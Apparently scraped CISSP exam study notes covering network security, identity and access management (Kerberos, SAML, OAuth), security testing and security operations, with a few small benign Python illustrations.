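print(filter_packet("203.0.113.7", "10.0.0.9", 23))    # deny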

NAC (NETWORK ACCESS CONTROL)


Network Access Control (NAC) refers to a security approach that enforces policies
to control access to network resources based on various factors such as user
identity, device security posture, and location.

NAC solutions help organizations ensure that only authorized users and devices
have access to their networks, protecting against unauthorized access, data
breaches, and other security risks.
NAC solutions typically involve a combination of hardware and software
components that work together to authenticate users and devices, enforce access
policies, and continuously monitor and manage network access.

Some popular NAC solutions include Cisco Identity Services Engine (ISE), Aruba
ClearPass, and Pulse Secure.

NAT (NETWORK ADDRESS TRANSLATION) & PAT (PORT


ADDRESS TRANSLATION)
Both are network techniques used to manage IP addresses and ports. Both
techniques are commonly used in network settings to simplify address
configuration and improve security.
NAT translates private IP addresses on an internal network to public IP addresses
(classically one-to-one), while

PAT allows many devices on a private network to share a single public IP address
by giving each session its own unique source port number.
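A hypothetical sketch of the translation table a PAT device keeps (addresses and ports are invented): many internal hosts map onto one public address, distinguished only by port.

# Hypothetical PAT translation table: many private hosts share one public IP.
PUBLIC_IP = "203.0.113.10"

pat_table = {}       # (private_ip, private_port) -> (public_ip, public_port)
next_port = 40000

def translate_outbound(private_ip, private_port):
    global next_port
    key = (private_ip, private_port)
    if key not in pat_table:
        pat_table[key] = (PUBLIC_IP, next_port)
        next_port += 1
    return pat_table[key]

print(translate_outbound("192.168.1.10", 51000))   # ('203.0.113.10', 40000)
print(translate_outbound("192.168.1.11", 51000))   # ('203.0.113.10', 40001)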

DESIGN AND ESTABLISH SECURE COMMUNICATION


CHANNEL
PROTOCOL — A set of rules by which two devices communicate
IPSEC
SSH (SECURE SHELL PROTOCOL)

1)Replacement of Telnet
2) Cryptographic network protocol
3) Helps prevent MITM (Man-in-the-Middle) attacks
4) SSH2 provides more security against Eavesdropping, DNS&IP Spoofing and
MITM attack.
TLS vs SSL
AUTHENTICATION PROTOCOLS (PAP, CHAP, EAP)
EAP TYPES
DIAL-UP PROTOCOL (PPP and SLIP)
VPN (VIRTUAL PRIVATE NETWORK)
A VPN, or Virtual Private Network, is a technology that allows you to create a
secure and encrypted connection between your device and the internet. It creates
a private network within a public network, protecting your online activities and
data from prying eyes. With a VPN, you can browse the internet anonymously,
access geo-restricted content, and protect your sensitive information from hackers
and surveillance. VPNs are especially useful when using public Wi-Fi networks, as
they add an extra layer of security.

3 Types of VPN

1)Remote Access VPN, 2) Site to Site IPSEC VPN and 3) Extranet VPN
VPN MODES

VPN tunnel modes refer to the different methods used to encapsulate and
transport data securely over a virtual private network (VPN). The two commonly
used tunnel modes are transport mode and tunnel mode.

Transport mode is used for end-to-end protection between two hosts, for example
when the communicating endpoints themselves terminate the VPN. In this mode, only
the data payload of the packet is encrypted and encapsulated; the original IP header
stays intact. Transport mode is typically used for point-to-point (host-to-host)
connections.

Tunnel mode, on the other hand, is typically used between security gateways, as in
site-to-site VPNs where whole networks communicate over the public Internet. In this
mode, the entire IP packet, including the original IP header, is encrypted and
encapsulated within a new IP packet.

The two modes offer different levels of protection: tunnel mode also conceals the
original source and destination addresses, while transport mode does not.


RADIUS (Remote Authentication Dial-In User Service)

Using the Remote Authentication Dial-In User Service (RADIUS) protocol for
network security and access control is referred to as “radius networking.” Network
devices can connect with a centralized authentication server to check user
credentials, grant access, and monitor accounting data using the widely used
RADIUS protocol. In settings like Wi-Fi networks, Virtual Private Networks
(VPNs), and Network Access Control (NAC) systems, it is frequently employed. By
offering centralized authentication and access control throughout their network
infrastructure, enterprises can increase security, streamline management, and
improve user experience by deploying RADIUS networking.
TACACS+ (Terminal Access Controller Access-Control System Plus)

A network protocol called TACACS (Terminal Access Controller Access Control


System) is used in computer networks for centralized authentication,
authorization, and accounting (AAA) services. By limiting who can enter into
network devices and what they can do once logged in, it offers a mechanism to
govern and secure network access. TACACS allows for more flexibility and control
over network access by separating the roles of authentication, authorization, and
accounting. Organizations can increase network security and more efficiently
manage user access by deploying TACACS.
DIAMETER

Diameter is an authentication, authorization, and accounting (AAA) protocol that


evolved from RADIUS, offering a larger attribute space, better reliability (it runs
over TCP/SCTP rather than UDP), and stronger security. By giving network elements a
way to confirm the identities of other entities, it promotes secure communication.
Diameter is frequently employed in telecommunications (e.g., LTE/IMS core networks)
and Internet of Things applications.
CDN (CONTENT DELIVERY NETWORK)

A content delivery network (CDN) is a group of dispersed servers that assists in


delivering web content to users according to their location. The way CDNs
function is by caching copies of web content in numerous data centers all over the
world. The CDN routes a user’s webpage request to the closest server, minimizing
latency and speeding up page load times. Popular websites and platforms
frequently employ CDNs in order to handle high traffic volumes, assure quick
content delivery, and enhance user experience.
SNMP (SIMPLE NETWORK MANAGEMENT PROTOCOL)

SNMP (Simple Network Management Protocol) is a widely used protocol for


network management, allowing administrators to monitor and configure network
devices, such as routers, switches, and servers. It uses a hierarchical management
structure, with a management station (management applications) communicating
with agents running on devices, providing management information and receiving
configuration data.
VLANS (VIRTUAL LOCAL AREA NETWORK)

VLANs, also known as Virtual Local Area Networks, are a way to logically divide a
physical network into smaller segments. This helps with network management,
security, and performance optimization. With VLANs, devices can be grouped
based on factors like department, location, or function, and can communicate
with each other as if they were connected to the same physical network. VLANs
can help reduce network congestion by segmenting traffic and improving overall
network performance.
SDN (SOFTWARE DEFINED NETWORK)

SDN stands for Software-Defined Networking. It is a network architecture that


separates the control plane from the data plane, allowing for more flexibility and
programmability in network administration. SDN enables network administrators
to define and enforce network policies through software, rather than through
manual configuration of network devices.
MICRO SEGMENTATION

PREVENT OR MITIGATE NETWORK ATTACK

1. Email Server
2. SPAM
3. Port-Scan
4. Tear Drop
5. Overlapping Fragment Attack
6. SMURF Attack
7. Fraggle Attack
8. DoS
9. SYN Flood
10. Spoofing
[Link] Attack
12. DNS Spoofing Attack
CISSP: Domain 5 — Identity and Access
Management : Easy Notes to Pass CISSP
Certification in 2023–24
[Link]

DOMAIN OBJECTIVES
CONTROL PHYSICAL AND LOGICAL ACCESS TO ASSETS
MANAGE IDENTIFICATION AND AUTHENTICATION OF PEOPLE, DEVICES
AND SERVICES
FEDERATED IDENTITY WITH 3RD PARTY SERVICES
IMPLEMENT AND MANAGE AUTHORIZATION MECHANISMS
MANAGE THE IDENTITY AND ACCESS PROVISIONING LIFECYCLE
IMPLEMENT AUTHENTICATION SYSTEMS

Control physical and logical access to assets


o Object: — A passive entity, such as a server or file, that houses information or
functionality.
o Subject: — An active entity, such as a user, program, or process, that requests
access to an object or the data contained in an object.
o Access: — The flow of information between a subject and an object.
Access Control Systems

Systems, either physical or technological, that are intended to regulate who or


what has access to a network. The most basic illustration is a door that can be
locked, preventing individuals from entering from either side.
• By — Whom (Employees, Third Parties, Visitors, Anonymous)
What (Device, Named, Anonymous)
• To — Assets — Information, Systems, Equipment, and Infrastructure
There are two types of Access Control systems

Physical ( Physical lock)


▪ History of “whom” and “when”
▪ Time and Attendance

Technical/Logical
▪ Built into Operating System
▪ Part of logic of APP or DB
▪ Third Party
▪ Control communication

Administration Approach

1. Centralized
2. Decentralized
3. Hybrid

Centralized administration

1) By centralized administration, we mean that one component is in charge of


setting up access controls so that users can access data and carry out their
necessary tasks.

2) The key benefit of centralized administration is the ability to keep extremely


stringent control over information because very few people have the authority to
make changes. Simple to Control.

3) Uniform and consistent standards and procedures.


Decentralized administration (user decides)

1) In contrast to centralized administration, decentralized administration means


that the owners or authors of the files, whoever or wherever they may be, control
access to information.

2) Control is in the hands of those who are most responsible for the information,
most knowledgeable with it, and most equipped to determine who should be able
to do what in respect to it, which is a benefit of decentralized administration.

3) One drawback, however, is that the methods and standards for granting user
access and capabilities may not be uniform among creators/owners.

4) Another drawback is that it could be more challenging to create a system-wide


view of all user access to the system at any given time when requests are not
centrally processed.

Hybrid approach

1. A hybrid approach allows for both centralized and decentralized


management of certain types of information.

One usual approach is that the file creators/owners govern the types of
access or users’ capabilities for the files under their control, while central
administration is in charge of the broadest and most basic access.

Manage identification and authentication of people,


devices, and services
Identification, Authentication, and Authorization

Relationship between Identification, Authentication, and Authorization


• Identification provides uniqueness
• Authentication provides validity of the identity
• Authorization provides control over access levels

Identification
1) It is the first step in all access control and asserts a distinct identity for a person
or system.
2) It is impossible to decide how to implement the proper controls without
adequate identification.

Authentication
1) It is the process of confirming a user’s identity.
2) The user gives a set of personal information that only they have access to or
knowledge of.

Something you own along with something you know and are. Auditing
(Accountability) won’t be successful without authentication.

Authorization
1) The process of identifying the precise resources a user requires.
2) And figuring out what kind of access the user might have to those resources.
Identification Methods

▪ Identification / Access Badge


▪ User ID
▪ MAC address
▪ Account Number
▪ RFID / FASTag
▪ IP Address

SSO (SINGLE SIGN ON)

1)Single sign-on (SSO) enables users to log in only once and then be automatically
authenticated when accessing other resources.
2) A unified login experience.
3) A central database for user credentials (such as passwords and user IDs linked
to a number of applications).
4) Authenticates once
5) The SSO client mimics a user entering his or her own user ID and password.
6) Single Point of Failure is the Main Issue

Weakness of Centralized SSO Systems


1) A single password is used to safeguard all of a user’s credentials in centralized
SSO systems.
2) Many SSO systems maintain a single database that contains all user credentials
and authentication data.

KERBEROS PROTOCOL

▪ Uses Symmetric Encryption ( AES )


▪ The primary goal of Kerberos is to ensure private communications between
systems over a network.
▪ SSO authentication system that provides enhanced security features.

The Kerberos security system guards a network with three elements


• Authentication
• Authorization
• Auditing

Based on the interaction between three systems


• Requesting system
• Endpoint destination server
• Kerberos or Key Distribution Center ( KDC) who issues the ticket
Kerberos Authentication Process

Kerberos Tickets
▪ To request and obtain service tickets, the user must first authenticate themselves
once using a conventional log-on process and be confirmed by message
encryption.
▪ The user obtains a TGT (Ticket Granting Ticket) after successfully
authenticating with the AS (Authentication Server).
▪ The TGT enables the user to ask the TGS (Ticket Granting Service) for a service
ticket, authenticate using encryption procedures, and obtain an ST (Service Ticket)
for the user to give to the target resource system.
▪ Possession of the ST denotes that the user has been verified and that access may
now be granted.
▪ Tickets have a limited lifetime (a minimal simulation of this flow follows below).
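The following is a toy simulation of the AS → TGS → service flow, assuming Python's cryptography package; Fernet stands in for Kerberos's symmetric (AES) encryption, and all names and messages are invented for illustration.

# Toy Kerberos-style ticket flow using Fernet symmetric encryption (illustration only).
from cryptography.fernet import Fernet

# Long-term keys held by the KDC (normally derived from passwords or service secrets).
user_key = Fernet.generate_key()      # shared between user and AS
tgs_key = Fernet.generate_key()       # known only to the KDC/TGS
service_key = Fernet.generate_key()   # shared between TGS and the target service

# 1. AS exchange: the user authenticates once and receives a TGT.
tgt_session_key = Fernet.generate_key()
tgt = Fernet(tgs_key).encrypt(b"user=alice;key=" + tgt_session_key)   # TGT (opaque to the user)
as_reply = Fernet(user_key).encrypt(tgt_session_key)                  # session key for the user

# 2. TGS exchange: the user presents the TGT and asks for a service ticket (ST).
session_key = Fernet(user_key).decrypt(as_reply)
assert Fernet(tgs_key).decrypt(tgt).endswith(session_key)             # TGS validates the TGT
st_session_key = Fernet.generate_key()
service_ticket = Fernet(service_key).encrypt(b"user=alice;key=" + st_session_key)

# 3. AP exchange: the user hands the ST to the target service, which decrypts it
#    with its own key and therefore trusts that the KDC vouched for the user.
print(Fernet(service_key).decrypt(service_ticket))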
Limitations of Kerberos:
○ The security of the whole system depends on careful implementation.
○ KDC can be a target
○ KDC can be a single point of failure and should be supported by backup and
continuity plans
○ The length and lifetime of the keys are very important.

SESAME: (Alternative to Kerberos)

Supports both Symmetric and Asymmetric encryption

SINGLE / MULTIFACTOR AUTHENTICATION


• Something you know. e.g. Password or Pin
• Something you have. e.g. Token
• Something you are. e.g. Biometrics
• Somewhere you are e.g. Location-based Authentication.

TOKENS
HARD TOKEN TYPES
SOFT TOKENS
Soft Token implementation
• Stored on a general-purpose computer
• Require activation through a second factor.
• Private keys must be non-exportable.
• Never store keys in plaintext or unencrypted form.
• Biggest concern: Human Error.

Compared to hard tokens:


• Generally cheaper to implement
• Easier to manage than hard tokens

BIOMETRIC
▪ A biometric system is typically checked for around 95% accuracy.
▪ Biometric systems are the most accurate form of authentication but the least accepted by users.
▪ Examples of biometrics — fingerprint, retina scan.
▪ Biometric devices rely on measurements of the biological characteristics of an
individual.
▪ Gaining user acceptance is the most common difficulty with biometric
systems.
▪ Selected individual characteristics are stored as a template and compared with the
presented sample.
Authorization Mechanisms
DISCRETIONARY ACCESS CONTROL (DAC)
NON-DISCRETIONARY ACCESS CONTROL (NDAC)
ROLE BASED ACCESS CONTROL (RBAC)

RULE BASED ACCESS CONTROL (RuDAC)

It’s a DAC Model


• Access is based on a list of predefined rules that determine what access should
be granted.
• The rules, created or authorized by system owners, specify the privileges granted
to users when a specific condition of a rule is met.
• E.g. — firewall rules, or "allow a user access only between 9 am and 5 pm, otherwise reject".
• Access is based on situational if-then rules (a small sketch follows this list).
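A hypothetical if-then rule check in the spirit of the examples above (the rule, role, and hours are invented):

# Hypothetical rule-based access check: access is granted only while the rule's condition holds.
from datetime import datetime

def rule_based_check(user, hour=None):
    hour = datetime.now().hour if hour is None else hour
    # Rule authorized by the system owner: staff may access the system 09:00-17:00.
    if user.get("role") == "staff" and 9 <= hour < 17:
        return "allow"
    return "reject"

print(rule_based_check({"role": "staff"}, hour=10))   # allow
print(rule_based_check({"role": "staff"}, hour=22))   # reject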
MANDATORY ACCESS CONTROL (MAC)
ATTRIBUTE BASED ACCESS CONTROL (ABAC)

ACCESS CONTROL LIFECYCLE

Identity and Access Management ( IAM )


• Obtain visibility/control over user access privileges, i.e., who has access to what
• Detective controls
• Corrective controls ( Periodic Recertification )
• Access policy with implementing rules.
• Automated account reconciliation to detect unauthorized changes
JUST IN TIME ACCESS
FEDERATIONS
FEDERATED IDENTITY

1)Federated Identity Systems allow trust access and verification across multiple
organizations.
2) A Federated identity is a portable identity that can be used across business
entitlements, It allows a user to be authenticated across multiple IT systems and
enterprises.
3) OAuth, Open-ID
4) Federated Identity Management:
Each organization in the federation subscribes to a common:
▪ Set of policies, standards, and procedures for provisioning and managing user
identification, authentication, and authorization information.
▪ Trust access & verification across multiple organizations.
▪ Federated identities link user profile information at multiple locations without
synchronization or directory consolidation (e.g., TCS UK and TCS India share the
same desktop profiles).

SAML (Security Assertion Markup Language)

1) SAML's primary goal is authentication


2) The XML Standard, which permits the transfer of authentication and
permission information between security domains.
3) The identity of the subjects and authorization decisions regarding their level of
access are conveyed in the form of assertions through a secure HTTP connection.
4) It enables web-based authentication and authorization situations, including
SSO, and provides the authentication components to the Federated Identity
Management System.
5) A claim, statement, or declaration of fact made by a SAML authority is known
as an assertion.
There are 3 roles in SAML

1)IDP (Identity Provider) — makes an assertion about another identity, based


on information
2) SP ( Service Provider ) — This entity is the relying party that is being asked
to provide its service or resource.
3) Subject — This entity is the subject of the assertion, usually a person,

The four primary components of SAML are

1)Assertion
2) Binding
3) Protocol
4) Profile
XACML (Extensible Access Control Markup Language)

• Designed for Authorization and Describe the access control.


• It commonly implements policies as an attribute-based access control system
but can use role-based access control.
• It helps assure all members in a federation that they are granting the same level
of access to different roles.
• XACML and SAML are together used to create a federated IAM system.
• SAML shares authentication (an XML token) and authorization details; the
authorization details are expressed in XACML.
• SAML is used to share authentication data between multiple services and applications.

Any exam question talking about ONLY AUTHORIZATION


managed via RBAC — then the answer = XACML

Also used in SDN (Software Defined Networking)

1. OAUTH 2.0 (AUTHORIZATION)

OAuth differs from OpenID and SAML in that it is used exclusively for authorization
purposes, not for authentication.
The OAuth specification defines the following roles:

1) The Resource Owner — the end user or entity that owns the resource in question
2) The Resource Server (OAuth Provider), which is the entity hosting the
resource
3) The Client (OAuth Consumer), which is the entity that wants to consume the
resource after being authorized by the resource owner
2. OPEN ID CONNECT (AUTHENTICATION)

1)OpenID is a free standard allowing other parties to authenticate users.


2) Single sign-on scenarios are made possible by OpenID Connect,
3) Uses OpenID but a JavaScript Object Notation (JSON) Web Token (JWT), also
known as an ID token.
4) The token contains a field signed with the shared secret, providing the relying
party with assurance that the user is authenticated.
5) OpenID Connect also makes use of simple REST/JSON message flows, with the
design goal of keeping simple things simple and making complicated things possible.

Three roles are specified by the OpenID specification.

1) The End User — an entity or end user seeking to confirm its identity


2) RP, or Relying Party — the relying party is the organization tasked with
confirming the user's identity.
3) OP, or OpenID Provider — the OP registers the OpenID URL and has the
authority to confirm the end user's identity.
SUMMARY

IDaaS (IDENTITY AS A SERVICE)


• Identity as a Service (IDaaS) is a cloud-based component of identity management
(IDM) solutions and is often discussed alongside the CASB (Cloud Access Security
Broker) model.
• As a digital identity, IDaaS provides administration of identity information.
• You can use this identity for online transactions.
• When something has an identity, it has a number of characteristics that help
people recognize it.
• A combination of administration and account provisioning, authentication,
authorization, and reporting functions.
• A cloud-based service that mediates
identity and access management functions to the target system/application on the
premises of the client and/or in the cloud.
• IDaaS offers cloud-based services that connect target systems on the customer's
premises with IAM capabilities.
• SaaS and IDaaS are frequently combined.
• Availability is the main concern.
CLOUD SECURITY

Cloud identity and access management Problems

1) APIs — Although some interfaces may be provided by providers, it is unlikely


that they will provide all of them.
2) Authorization mapping — As identity is maintained by the cloud provider, how
users are given privileges may need to change.
3) Audit: It may be challenging to get providers to produce logs, since they must
be careful not to reveal data from other clients who share virtual machine tenancy.
4) Privacy: Private user data is transmitted over the Internet and kept on servers
that are not under your direct control. This poses a significant risk to the
company.
5) Latency: Pushing configurations to the cloud may take some time. Risk may
arise if user rights are changed slowly.
6) App identity: If you want to ensure that the identities of your cloud-based
users aren't being used by illegitimate apps, be aware that apps may not always
validate a client's identity.
7) Mobile: Cloud service providers frequently provide mobile applications,
adding another system and attack surface that you must protect.
CISSP: Domain 6 — Security Assessment and
Testing: Easy Notes to Pass CISSP
Certification in 2023–24
[Link]

OBJECTIVE
DESIGN AND VALIDATE ASSESSMENT, TEST AND AUDIT STRATEGIES
CONDUCT SECURITY CONTROL TESTING
COLLECT SECURITY PROCESS DATA (TECHNICAL AND ADMIN)
ANALYZE TEST OUTPUT AND GENERATE REPORT
CONDUCT OR FACILITATE SECURITY AUDITS

Assessment = Process

Testing = Technique

Organization develops policy / plan


Based on policy, Assessment is done
Based on Assessment, Reports are produced
Internal Assessment — Inhouse Team

External Assessment — 3rd party audit firm

DESCRIBING VULNERABILITIES

A. CVE (Common Vulnerabilities and Exposures) — Provides a naming


system for describing security vulnerabilities

Assigning code (signature) to each and every vulnerability

B. CVSS (Common Vulnerability Scoring System) — Provides a


standardized scoring system for describing the severity of security vulnerabilities

Base Score — Vulnerabilities details


Temporal Score — Vendor details for Vulnerabilities
Environmental Score — What is Vulnerability impact in organization
Exam question — In CVSS, which score should you base your
decision on?

Answer — Environmental Score

C. CCE (Common Config Enumeration) — Provides a naming system for


system configuration issues

LOG MANAGEMENT


Log Management: Enhancing Visibility and Security

Log management is a crucial component of modern IT operations, providing


insights, security, and compliance benefits.

1. What is Log Management?


 Log management refers to the process of collecting, storing, and
analyzing logs or records generated by various hardware and software
systems.
 Logs contain valuable information about system activities, errors, user
interactions, and security events.

2. The Importance of Log Management:

 Visibility: Logs offer a real-time and historical view of system


performance and activities, aiding in troubleshooting and monitoring.
 Security: Log analysis helps detect and mitigate security threats by
identifying suspicious or anomalous behavior.
 Compliance: Many regulatory standards, such as GDPR and HIPAA,
require organizations to maintain and protect logs for auditing purposes.

3. Key Components of Log Management:

 Log Collection: Automated gathering of logs from various sources,


including servers, network devices, applications, and security systems.
 Log Storage: Secure and scalable storage solutions are essential to retain
logs for extended periods while ensuring data integrity.
 Log Analysis: Advanced tools and algorithms are used to parse and
interpret logs, turning raw data into actionable insights.
 Alerting and Reporting: Automated alerts and reports notify
administrators of critical events or issues in real-time.

4. Benefits of Effective Log Management:


 Faster Troubleshooting: Rapid identification and resolution of issues,
minimizing downtime and productivity loss.
 Proactive Security: Early detection of security breaches and potential
vulnerabilities before they escalate.
 Historical Analysis: Historical logs enable trend analysis, helping
organizations make informed decisions for future improvements.
 Compliance Adherence: Meeting regulatory requirements by maintaining
comprehensive log records.

5. Challenges in Log Management:

 Volume: The sheer volume of logs generated can be overwhelming,


necessitating scalable solutions.
 Complexity: Logs come in various formats, making parsing and analysis
challenging.
 Security: Protecting log data from unauthorized access is crucial to
maintain data integrity and privacy.

6. Best Practices:

 Centralized Logging: Store logs in a central repository for easy access and
analysis (a minimal sketch follows this list).
 Regular Review: Consistently review logs to identify emerging issues or
threats.
 Automated Alerts: Set up automated alerts to respond promptly to
critical events.
 Data Retention Policies: Define policies for log retention to balance
storage costs and compliance requirements.
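A minimal sketch of centralized logging, assuming Python's standard library and a hypothetical central syslog collector at logserver.example.com (the hostname, application name, and message are invented):

# Forward application logs to a central syslog collector (hostname is hypothetical).
import logging
import logging.handlers

logger = logging.getLogger("payments-app")
logger.setLevel(logging.INFO)

# Ship every record to the central log server instead of keeping it only on this host.
handler = logging.handlers.SysLogHandler(address=("logserver.example.com", 514))
handler.setFormatter(logging.Formatter("%(name)s %(levelname)s %(message)s"))
logger.addHandler(handler)

logger.warning("5 failed logins for user alice in 2 minutes")   # candidate for an automated alert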
SIMULATION

Synthetic transactions
Artificial scenarios
Pre-production environment

Limitations of production / operations


Example — BOSON practice test (simulated)

SECURITY THROUGHOUT THE DEVELOPMENT LIFE CYCLE

Fixing bugs and security vulnerabilities as early as possible


Save COST and Save TIME
During Application Development

1. SAST — (Static Application Security Testing)

 Analysis of application source code to find vulnerabilities without


executing the application.
 Requires access to the source code (a code-level illustration of what SAST flags follows after point 3)

2. DAST — (Dynamic Application Security Testing)

 Testing against the running application.


 NO access to the source code

3. RASP — (Runtime Application Self-Protection) ≈ SAST + DAST

 Monitors and protects the application at runtime, as real users interact with it
TESTING TECHNIQUES (Very imp for exam)

Black-box testing vs. white-box testing


Dynamic testing vs. static testing
Manual testing vs. automated testing
ACTIVITIES IN TEST ENVIRONMENT
1) VA — Vulnerability Assessment
2) PT — Penetration Testing
3) OVERT or COVERT
4) Fuzzing (see the sketch below)
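A minimal sketch of fuzzing: feed large numbers of random, malformed inputs to a target routine and record any input that makes it crash (the target function here is invented for illustration).

# Minimal fuzzer: random malformed inputs are fed to a target, crashes are recorded.
import random, string

def parse_record(data):             # hypothetical target routine under test
    fields = data.split(",")
    return int(fields[0]), fields[1].upper()

crashes = []
for _ in range(1000):
    fuzz_input = "".join(random.choices(string.printable, k=random.randint(0, 20)))
    try:
        parse_record(fuzz_input)
    except Exception as exc:        # any unhandled exception is a finding
        crashes.append((fuzz_input, type(exc).__name__))

print(f"{len(crashes)} crashing inputs found")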
TESTING METHOD FACTORS (When Selecting Testing and Tools)

1. Attack Surface — — — — — — → What and Where to Test


2. Application Type — — — — — -> Behaviour
3. Quality of Result — — — — —-> Output
4. Supported Technology — — -> Supported Platform
5. Performance/Resource utilization — →Compute Power

NEGATIVE & POSITIVE TESTING

1. POSITIVE TESTING

 The system works as expected for valid business use cases


 Use Case Testing

2. NEGATIVE TESTING

 Ensures the system can handle invalid use cases, whether accidental or


deliberate
 Misuse Case Testing
PENETRATION TESTING (PT)
Penetration Test Steps ( EXAM IMP Sequence )
A. Planning ( Can be Overt/Covert )

 Management Signed Off

B. Discovery

 Information gathering and scanning.


 Vulnerability Analysis
 Which involves identifying and documenting information about the
target •

C. Attack

 Gaining Access, Escalating Privileges

D. Reporting

 It occurs during the same timeline as Planning, Discovery, Attack Phase


 The reporting phase occurs simultaneously with the other three phases of
the penetration test (see Figure above). The development of the
assessment plan, or ROE (Rules of Engagement), occurs during the planning phase. Written
logs are typically kept during the discovery and attack phases, and
system administrators or management may receive periodic reports.
Following the test, a report is often created to outline the vulnerabilities
found, provide a risk assessment, and provide recommendations for
mitigating the weaknesses found.
SOFTWARE TESTING TENETS
Type of Testing

A) Unit testing
• Does a particular piece of code properly perform the task it is intended to?
• Testing focuses on the early examination of sub-program functionality and ensures
that functionality not visible at the system level is examined by testing.

B) Integration Testing
• Does the application behave as expected when integrated and Communicating
with other systems in the environment?
•Testing focuses on the transfer of data and control across a program’s internal
and external interface. External interfaces are those with other software
( including operating system software ), system hardware, and the users and can
be described as communication links.

C) System Testing
• This ensures that the application provides the required functionality and that the
application is trustworthy as deployed in regard to security, privacy, performance,
recovery, and usability.
D) Comprehensive Code Testing program
• With an emphasis throughout the SW development lifecycle, can ensure that
developed applications are deployed with minimal vulnerabilities.

E) Regression Testing
• Provide assurance that a change has not created problems elsewhere in the
software product.
• Regression analysis is the determination of the impact of a change based on a
review of the relevant documentation

F) Interface Testing
• Checks components are in sync
• Data Transfer happens per design
• Control passes correctly

ISCM (INFORMATION SECURITY CONTINUOUS MONITORING)


ISCM aligns all facets of the organization, including the people, processes, and
technology in place.

ISCM IMPLEMENTING STEP

Define an ISCM strategy based on risk tolerance that maintains clear visibility
into assets, awareness of vulnerabilities, up-to-date threat information, and
mission/business impacts.

Establish an ISCM program determining metrics, status monitoring


frequencies, control assessment frequencies, and an ISCM technical architecture.

Implement an ISCM program and collect the security-related information


required for metrics, assessments, and reporting. Automate the collection,
analysis, and reporting of data where possible.
Analyze the data collected and Report findings, determining the appropriate
response. It may be necessary to collect additional information to clarify or
supplement existing monitoring data.

Respond to findings with technical, management, and operational mitigating


activities or acceptance, transference/sharing, or avoidance/rejection.

Review and Update the monitoring program, adjusting the ISCM strategy and
maturing measurement capabilities to increase visibility into assets and
awareness of vulnerabilities.

INTERNAL AND 3RD PARTY AUDIT


A. 1st Party Audit —-> Internal

B. 2nd Party Audit —> Audit of Supplier/Vendor

C. 3rd Party Audit —→ Certification bodies (independent companies, e.g., ISO, RBI)


SAS 70

SOC REPORT COMPARISON

SOC 1 Report: “SOC 1 reports focus on a service organization’s internal controls


relevant to financial reporting, providing assurance to clients and auditors.”

SOC 2 Report: “SOC 2 reports assess security, availability, processing integrity,


confidentiality, and privacy controls, demonstrating a commitment to data
protection and trustworthiness.”
SOC 3 Report: “SOC 3 reports are concise summaries of SOC 2 reports,
designed for public consumption, highlighting a service organization’s
commitment to security, privacy, and compliance.”
CISSP: Domain 7 — Security Operations:
Easy Notes to Pass CISSP Certification in
2023–24
[Link]

OBJECTIVE
UNDERSTAND AND COMPLY WITH INVESTIGATIONS
CONDUCT LOGGING AND MONITORING ACTIVITIES
PERFORM CONFIGURATION MANAGEMENT (e.g. Provisioning, Baselining,
Automation)
APPLY FOUNDATIONAL SECURITY OPERATIONS CONCEPTS
APPLY RESOURCE PROTECTION
CONDUCT INCIDENT MANAGEMENT
OPERATE AND MAINTAIN DETECTIVE AND PREVENTIVE MEASURES
IMPLEMENT AND SUPPORT PATCH AND VULNERABILITY MANAGEMENT
UNDERSTAND AND PARTICIPATE IN CHANGE MANAGEMENT PROCESSES
IMPLEMENT RECOVERY STRATEGIES
IMPLEMENT DISASTER RECOVERY (DR) PROCESSES
TEST DISASTER RECOVERY PLANS (DRP)
PARTICIPATE IN BUSINESS CONTINUITY (BC) PLANNING AND EXERCISES
ADDRESS PERSONAL SAFETY AND SECURITY CONCERNS
UNDERSTAND AND SUPPORT INVESTIGATIONS
UNDERSTAND AND SUPPORT INVESTIGATIONS

1) Incident Scene
2) Evidence e.g EDRM (Electronic Discovery Reference Model)
3) Evidence Collection and Handling
4) Data Forensic Process

A. INCIDENT SCENE

Incident = anything that compromises security

Incident scene is the environment where potential evidence may exist.

B. EVIDENCE

Data that is dynamic and exists in processes that disappear in a relatively short
timeframe once the system is powered down

Locard Exchange Principle — When crime is committed, attacker


leaves SOME EVIDENCE behind and take something with them.

General Guidelines

1. All procedural and general jurisprudential rules must be followed.


2. Digital evidence shall not be changed as a result of its seizure.
3. Training is required for everyone who accesses original digital evidence.
4. Complete documentation, preservation, and reviewability are required for all
actions involving the acquisition, access, storage, or transfer of digital evidence.
5. A person is accountable for all activities while in possession of digital evidence.

EDRM (Electronic Discovery Reference Model) — Systematic way of


collecting digital evidence.

Any question in exam having words such as below Answer = EDRM

Legal Proceeding
Litigation
Freedom of Information

C. EVIDENCE COLLECION AND HANDLING

All material associated with the incident could be pertinent to an


investigation and used as evidence
1. Data that may have been compromised
2. System (HW or SW) that may have been compromised
3. Information from people about the knowledge of incident
4. Information about the incident scene

Common Practices for Handling Evidence for Security Professionals

1. Chain of Custody
2. Copies of all data
3. Analyze copies instead of originals
4. Appointing an evidence custodian
5. Document everything
6. Avoid modification
7. Collection is sensitive process

Chain of Custody

D. DATA FORENSIC PROCESS


ANALYSIS

1. NETWORK ANALYSIS

a) Firewall Logs
b) IDS/IPS Logs
c) Traffic logs / Path tracing.

2. MEDIA ANALYSIS

a) Recovery of Info / evidence from media (HDD,SDD etc)


b) Disk imaging and timeline analysis.
c) Slack space and shadow volume analysis.

3. SOFTWARE ANALYSIS

a) Malicious source code analysis.


b) Reverse engineering.
c) Exploit review.
d) Intellectual property disputes.
e) Copyright issues.

4. HARDWARE ANALYSIS

a) Embedded OS, Virtualized S/W and Hypervisor analysis.


b) Special tools and techniques are required to image embedded devices.
c) Difficult to find vulnerabilities on the hardware.

UNDERSTAND REQUIREMENT FOR INVESTIGATION


TYPES
TYPES OF INVESTIGATION

IDS / IPS
Intrusion detection systems (IDS) and intrusion prevention systems (IPS)
constantly watch your network, identifying possible incidents and logging
information about them, stopping the incidents, and reporting them to security
administrators.
SIEM (Security Information and Event Management)
SIEM, is a security solution that helps organizations recognize and address
potential security threats and vulnerabilities before they have a chance to disrupt
business operations.

It is a solution that collects and analyzes security-related data from various
sources to provide real-time threat detection and incident response. It helps
organizations meet compliance requirements and improve their overall security
posture by providing a single platform for monitoring, analyzing, and responding
to security events.
DLP (Data Loss Prevention)
DLP is a part of a company's overall security strategy that focuses on detecting
and preventing the loss, leakage, or misuse of data through breaches, exfiltration
transmissions, and unauthorized use.

DLP GOAL: Protect Business Data and IP

Data loss prevention is an approach to data security that implements a set of


processes, procedures, and tools to prevent the loss, misuse, or unauthorized
access of sensitive information. Four types of data loss prevention are network
DLP, endpoint DLP, cloud DLP and Email DLP.
DLP Rule Set

[Link] Based
